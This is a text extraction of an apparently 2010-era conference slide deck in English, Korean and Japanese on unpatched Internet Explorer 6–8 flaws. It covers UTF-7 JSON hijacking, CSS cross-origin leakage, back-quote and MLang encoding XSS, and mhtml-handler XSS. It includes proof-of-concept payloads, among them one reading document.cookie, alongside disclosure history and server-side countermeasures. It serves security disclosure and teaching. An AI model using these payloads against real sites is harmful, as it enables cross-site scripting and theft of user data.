Intenet Explorer exSpoilt Milk Codes

Intenet Explorer exSpoilt Milk codes ～ IE 에 대한 썩은 우유 공격 ～ Yosuke HASEGAWA http://j.mp/yosuke

http://j.mp/yosuke

Who am I ? 자기 소개 Yosuke HASEGAWA 하세가와 요스케 NetAgent Co.,Ltd. R&D dept 인터넷 에이전트 회사 연구 개발부 Microsoft MVP for Consumer Security Oct 2005 http://utf-8.jp/ Writing obfuscated JavaScript 자바스크립트 난독화 를 쓰고 있습니다 e.g. jjencode, aaencode INNOVATION TO THE FUTURE NetAgent Co., Ltd. 2

http://utf-8.jp/

3.

Today's topic 오늘의 화제 3

4.

Today's topic 오늘의 화제 IE6 is 'spoilt milk' web browser. IE6は腐ったミルクみたいなブラウザ Microsoft themselves admitted Microsoft自身も認めている Many security flaws left untouched for years. 長い間放置されている問題点が多数。 Junst only IE6? No. IE6だけ? まさか。 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 4

5.

IE6 is 'spoilt milk' browser IE6は腐ったミルクみたいなブラウザ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 5

6.

Today's topic 오늘의 화제 IE6 is 'spoilt milk' web browser. IE6は腐ったミルクみたいなブラウザ Microsoft themselves admitted Microsoft自身も認めている Many security flaws left untouched for years. 長い間放置されている問題点が多数。 Junst only IE6? No. IE6だけ? まさか。 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 6

7.

Many flaws left untouched for years 長い間放置されている問題点が多数 http://www.youtube.com/watch?v=KZSnCbGDl6Y INNOVATION TO THE FUTURE NetAgent Co., Ltd. 7

8.

Today's topic 今日の話題 IE6 is 'spoilt milk' web browser. IE6は腐ったミルクみたいなブラウザ Microsoft themselves admitted Microsoft自身も認めている Many security flaws left untouched for years. 長い間放置されている問題点が多数。 Junst only IE6? No. IE6だけ? まさか。 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 8

9.

Just only IE6? No. IE6だけ? まさか。 Also IE7 and IE8 has flaws IE7/8も問題あり INNOVATION TO THE FUTURE NetAgent Co., Ltd. 9

10.

Today's topic 오늘의 화제 for the IE9 IE9に向けて expect IE becomes more secure browser by shedding light on past flaws 既存の問題点を明らかにすることでIE9をセキュアなものに! INNOVATION TO THE FUTURE NetAgent Co., Ltd. 10

11.

Untouched flaws 방치된 채 문제 11

12.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 MLang encode conversion issue ✓ ✓ JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 12

13.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 MLang encode conversion issue ✓ ✓ JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 13

14.

MLang encode conversion issue MLangのエンコード変換時の問題 "MLang" : DLL for multi language support including conversion of text encoding MLang : 文字エンコーディング変換などを含む、複数の言語をサポートするためのDLL ConvertINetMultiByteToUnicode ConvertINetUnicodeToMultiByte ConvertINetString INNOVATION TO THE FUTURE NetAgent Co., Ltd. 14

15.

MLang encode conversion issue MLangのエンコード変換時の問題 IE handles text as Unicode from outside with conversion by MLang. IEはMLangを使って外部からの文字列を Unicodeに変換して処理 Shift_JIS, EUC-JP, EUC-KR, … HTML MLang <html> UTF-16LE INNOVATION TO THE FUTURE NetAgent Co., Ltd. 15

16.

MLang encode conversion issue MLangのエンコード変換時の問題 Converted to Unicode accordingly when given broken byte sequence. 壊れたバイト列を渡したときも、それなりにUnicodeに変換される "Converted accordingly"... 「それなりに変換」 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 16

17.

MLang encode conversion issue MLangのエンコード変換時の問題 meta characters ("<>) which don't exist in original byte sequence are generated. もとのバイト列に存在しない「"<>」などが生成され、XSSにつながる INNOVATION TO THE FUTURE NetAgent Co., Ltd. 17

18.

[beta]

MLang encode conversion issue
MLangのエンコード変換時の問題
<meta http-equiv="Content-Type"
content="text/html; charset=XXXXX" />
...
<input
value="(0xNN)(0xNN)(0xNN)onmouseover=alert(1)//
(0xNN)(0xNN)(0xNN)" type="text">
(0xNN)s are invalid byte sequence for charset XXXXX
0xNN は文字コード XXXXX において不正なバイト列

<input value="??"onmouseover=alert(1)// ??""
type="text">
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

18

19.

MLang encode conversion issue MLangのエンコード変換時の問題 too hard to prevent XSS by serverside. サーバ側でのXSS防止はたいへん validate all letters/bytes as the charset encoding 文字エンコーディングとして適切か全文字/全バイトを検証 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 19

20.

MLang encode conversion issue MLangのエンコード変換時の問題 Not published for details now 現状は詳細は非公開 Affected : IE6 / IE7 IE8 : fixed Reported : Oct 2007 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 20

21.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 MLang encode conversion issue ✓ ✓ JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 21

22.

JSON Hijack with UTF-7 Target: Containing secret data in JSON 機密情報を含むJSON If attacker can control a part of JSON string 攻撃者がJSON内の一部をコントロールできる e.g., Web mail notification 例えばWebメールの新着通知など Attacker can read inside data of the JSON JSON内のデータを盗み見できる INNOVATION TO THE FUTURE NetAgent Co., Ltd. 22

23.

[beta]

JSON Hijack with UTF-7
[
{

"name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",
"mail" : "[email protected]"
Injected by attacker
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}
]

JSON for target : http://example.com/newmail.json

This means...
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

23

24.

[beta]

JSON Hijack with UTF-7
convert from UTF-7 to another encoding...
[
{

"name" : "abc"}];var t=[{"":"",
"mail" : "[email protected]"
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}
]

JSON for target : http://example.com/newmail.json

INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

24

25.

[beta]

JSON Hijack with UTF-7
trap HTML page created by attacker
<script src="http://example.com/newmail.json" charset="utf-7">
<script> alert( t[ 1 ].name + t[ 1 ].mail ); </script>

JSON for target : http://example.com/newmail.json
[
{
"name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",
"mail" : "[email protected]"
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}
]
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

25

26.

[beta]

JSON Hijack with UTF-7
User

XHR.send(…)
eval( JSON )

JSON
{
"from" : "[email protected]"

}
INNOVATION TO THE FUTURE

Web mail
NetAgent Co., Ltd.

26

27.

[beta]

JSON Hijack with UTF-7
<script src=“json”>
HTML

User

Attacker

JSON

<script src=“json”>

From: "+MPv…ACI-"
JSON
{
"from" : "+MPv/…ACI-"

}
INNOVATION TO THE FUTURE

Web mail
NetAgent Co., Ltd.

27

28.

[beta]

JSON Hijack with UTF-7
trap HTML page created by attacker

priority

<script src="http://example.com/newmail.json" charset="utf-7">

JSON for target : http://example.com/newmail.json
Content-Type: application/json; charset=utf-8

charset in HTTP
response header

[
{

"name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",
"mail" : "[email protected]"
},
{
"name" : "John Smith",
"mail" : "[email protected]"
}

]
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

28

29.

JSON Hijack with UTF-7 Published at Black Hat Japan 2008 and POC2008 Black Hat Japan 2008, POC2008 にて発表 Affected : IE6 / IE7 IE8 : fixed Reported : Oct 2008 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 29

30.

[beta]

JSON Hijack with UTF-7
Countermeasure by server
サーバ側での対策
Escape "+" to "\u002b" in JSON
JSON内の + を \u002b にエスケープ
Accept only POST
POSTのみ受け入れる
{

"name" : "abc\u002bMPv/f...QA7-var t\u002bAD0A...."
}

INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

30

31.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 MLang encode conversion issue ✓ ✓ JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 31

32.

Bypass Content-Disposition Content-Dispositionの回避 Content-Disposition: attachment Download directive for browsers ブラウザへのダウンロード指令 often uses for preventing for XSS XSSの対策にときどき使用される Content-Type: text/html; charset=utf-8 Content-Disposition: attachment; filename=attach.html INNOVATION TO THE FUTURE NetAgent Co., Ltd. 32

33.

Bypass Content-Disposition Content-Dispositionの回避 Bypass "Content-Disposition: attachment" with specially crafted JavaScript by attacker. 攻撃者の細工したJavaScriptによりダウンロード指令をバイパス可能 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 33

34.

[beta]

Bypass Content-Disposition
Content-Dispositionの回避
trap page by attacker 攻撃者による罠ページ
<script>
// crafted JavaScript here.
// actual code is not open today :)
</script>
<iframe src="http://example.com/download.cgi"></iframe>
http://example.com/download.cgi :
target content with "Content-Disposition: attachment" .
「Content-Disposition:attachment」のついた攻撃対象コンテンツ

INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

34

http://example.com/download.cgi

35.

Bypass Content-Disposition Content-Dispositionの回避 Published: Jul 2007 in Japan 2007年7月に日本で公開 Affected : IE6 / IE7 / IE8 No way to prevent XSS by serverside サーバ側での対策方法はない INNOVATION TO THE FUTURE NetAgent Co., Ltd. 35

36.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 MLang encode conversion issue ✓ ✓ JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 36

37.

infomation leakage via CSS CSSを通じた情報の漏えい leakage of sensitive data from HTML via CSS "font-family", "quotes" CSS の font-family や quotes を通じて HTML内の機密情報が漏えい Fixed : MS10-071 at Oct 2010 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 37

38.

[beta]

infomation leakage via CSS
CSSを通じた情報の漏えい
target page containing sensitive data
<html>
<!-- injected by attacker -->
<div>}.a{font-family:a</div>
<!-- sensitive data here -->
<div>Secret data</div>

trap page created by attacker
<link rel="stylesheet" href="http://example.com/target.html" type="text/css">
...
<div class="a" id="target"></div>
<script>
alert(document.getElementById("target").currentStyle.fontFamily);
</script>
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

38

http://example.com/target.html

39.

[beta]

infomation leakage via CSS
CSSを通じた情報の漏えい
target page containing sensitive data
<html>
<!-- injected by attacker -->
<div>}.a{font-family:a</div>
<!-- sensitive data here -->
<div>Secret data</div>

trap page created by attacker
<style> @import url("http://example.com/target.html"); </style>
...
<div class="a" id="target"></div>
<script>
alert(document.getElementById("target").currentStyle.fontFamily);
</script>
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

39

40.

infomation leakage via CSS CSSを通じた情報の漏えい Published: Nov 2008 in Japan 2008年11月に日本で公開 Republished: Sep 2010, SA41271 2010年9月、Secuniaよりアドバイザリ Fixed: MS10-071 – Oct 2010 2010年10月、MS10-071にて修正 Affected : IE6 / IE7 / IE8 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 40

41.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 MLang encode conversion issue ✓ ✓ JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 41

42.

[beta]

JavaScript back-quotes issue
JavaScriptバッククォート問題

IE treats the accent grave (`) as an
attribute delimiter like " and '.
IEはバッククォートを"や'のように引用符とし
て扱う

<input type="text"
id='x' value=`abcd` />

INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

42

43.

[beta]

JavaScript back-quotes issue
JavaScriptバッククォート問題

Quotation mark (") will be stripped
from the attribute value when
using innerHTML property in case it
doesn't contain space.
innerHTMLを参照したときに属性値にスペー
スがなければ引用符(")は削除される
<div id="x">
<input type="text" value="abcd" >
</div>
...
alert( $("x").innerHTML );
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

43

44.

[beta]

JavaScript back-quotes issue
JavaScriptバッククォート問題
<div id="div1">
<input type="text" value="``onmouseover=alert(1)" >
</div>
<div id="div2"></div>
<script>
document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;
</script>
<DIV id=div2>
<INPUT onmouseover=alert(1) type=text></DIV>
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

44

45.

JavaScript back-quotes issue JavaScriptバッククォート問題 Published : Apr 2007 in Japan 2007年4月に日本で公開 Affected : IE6 / IE7 / IE8 Reported : Nov 2007 as IE8 beta feedback 2007年11月にIE8betaのフィードバックとして報告 "keep this behavior for backward compatibility", MS said. 「後方互換性のためにこの動作を残す」 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 45

46.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 MLang encode conversion issue ✓ ✓ JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 46

47.

XSS with mhtml handler mhtmlハンドラによるXSS At one time, IE had assumed and handled any contents as MHTML by using "mhtml" handler. かつてIEは、mhtmlハンドラを経由するとあらゆるコンテンツをMHTMLであるとして取り扱っていた INNOVATION TO THE FUTURE NetAgent Co., Ltd. 47

48.

[beta]

XSS with mhtml handler
mhtmlハンドラによるXSS

MHTML - Web archive format defined RFC2557
From: [email protected]
To: [email protected]
Subject: test
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
<html>
<body>
<h1>Hello</h1>
</body>
</html>
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

*.eml or *.mht
48

49.

[beta]

XSS with mhtml handler
mhtmlハンドラによるXSS
mhtml:http://example.com/test.html
<html>
<div>
Subject: test
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: base64
<html>
PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGR
<script>alert(document.location);</script>
vY3VtZW50LmxvY2F0aW9uKTs8L3Njcmlw
</html>
dD4NCjwvaHRtbD4NCg==
</div>
Injected by attacker
</html>
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

49

50.

[beta]

XSS with mhtml handler
mhtmlハンドラによるXSS
mhtml:http://example.com/test.html
<html>
<div>
Subject: test
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: base64

Should be fixed
PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGR
by MS07-034
vY3VtZW50LmxvY2F0aW9uKTs8L3Njcmlw
dD4NCjwvaHRtbD4NCg==
</div>
</html>
INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

50

51.

XSS with mhtml handler mhtmlハンドラによるXSS Should be fixed by MS07-034 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 51

52.

XSS with mhtml handler mhtmlハンドラによるXSS XSS via mhtml again. mhtmlによるXSS再び "JavaScript execution via MHTMLscheme" at HTML5 Security Cheatsheet by @Lever_One http://heideri.ch/jso/#96 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 52

http://heideri.ch/jso/#96

53.

[beta]

XSS with mhtml handler
mhtmlハンドラによるXSS
mhtml:http://heideri.ch/jso/test.html!xss.html
<html>
<body>
<b>some content without two new line \n\n</b>
Content-Type: multipart/related; boundary="***"<b>some content without two new line</b>
--***
Content-Location: xss.html
Content-Transfer-Encoding: base64

<iframe name=lo style=display:none></iframe>
PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1
<script>
cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9
url=location.href;document.getElementsByName('lo')[0].src=url.substring(6,url.indexOf('/',15));s
dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy
etTimeout("alert(frames['lo'].document.cookie)",2000);
YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg
</script>
-</body> </html>

INNOVATION TO THE FUTURE

NetAgent Co., Ltd.

53

54.

XSS with mhtml handler mhtmlハンドラによるXSS Published : May 2004 in Japan 2004年5月に日本で公開 Once fixed : Jun 2007 by MS07-034 2007年6月にMS07-034でいったん修正 Reopened : Jun 2010 2010年6月に再発 Affected : IE6 / IE7 / IE8 XP only? INNOVATION TO THE FUTURE NetAgent Co., Ltd. 54

55.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 MLang encode conversion issue ✓ ✓ How is IE9? JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 55

56.

Untouched flaws 放置されたままの脆弱性 affect flaws 6 7 8 9 MLang encode conversion issue ✓ ✓ JSON Hijack with UTF-7 ✓ ✓ bypass Content-Disposition ✓ ✓ ✓ infomation leakage via CSS ✓ ✓ ✓ JavaScript back-quote issue ✓ ✓ ✓ XSS with mhtml handler ✓ ✓ ✓ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 56

57.

Fixed at IE9b IE9ベータでは修正済み 57

58.

Conclusion 정리 58

59.

Conclusion 정리  IE6/7/8 have many flaws which were spotted ages ago and still have not been effectively addressed IE6/7/8とも長いあいだ修正されていない問題が多数存在  These are fixed in IE9 beta. IE9 betaではそれらは修正済み  Report flaws of IE9 while beta, if you find. IE9の問題を見つけたならベータの間に報告 Probably, too slowly to fix after releasing IE9 IE9リリース後は修正は遅くなるかも!? INNOVATION TO THE FUTURE NetAgent Co., Ltd. 59

60.

References 참고 자료  Attacking with Character Encoding for Profit and Fun http://bit.ly/alE7F3  JUMPERZ.NET http://www.jumperz.net/test/xss10.jsp  CSSXSSを改良した？手法でmixiのpost_keyを抜き取るデモを作りました ?D of K http://d.hatena.ne.jp/ofk/20081111/1226407593  Internet Explorer Cross-Origin CSS Style Sheet Handling Vulnerability - Advisories - Community http://secunia.com/advisories/41271/  ［これはひどい］IEの引用符の解釈－＠IT http://www.atmarkit.co.jp/fcoding/articles/webapp/01/webapp01a.html  [openmya:038082] MS07-034: mhtml:プロトコルハンドラによる任意のスクリプトの実行 http://archive.openmya.devnull.jp/2007.06/msg00060.html  JavaScript execution via MHTML-scheme - HTML5 Security Cheatsheet http://heideri.ch/jso/#96 INNOVATION TO THE FUTURE NetAgent Co., Ltd. 60

61.

Thanks to 감사의 말 David Ross and MSRC for helpful suggestions. @Lever_One for telling details about mhtml issue. Google Translation for 한글 번역 :-) ...and You! Thank you for your attention. INNOVATION TO THE FUTURE NetAgent Co., Ltd. 61

62.

Question? 질문 mail [email protected] [email protected] Twitter @hasegawayosuke Web site http://utf-8.jp/ INNOVATION TO THE FUTURE NetAgent Co., Ltd. 62

http://utf-8.jp/

Intenet Explorer exSpoilt Milk Codes

はせがわようすけ

関連スライド

CVSSとその限界

「脆弱性」「脅威」「リスク」の再整理

セキュリティにおける倫理って何だ？

Node.jsの色々

JavaScript難読化読経

CSPを無意味にする残念なServiceWorker

各ページのテキスト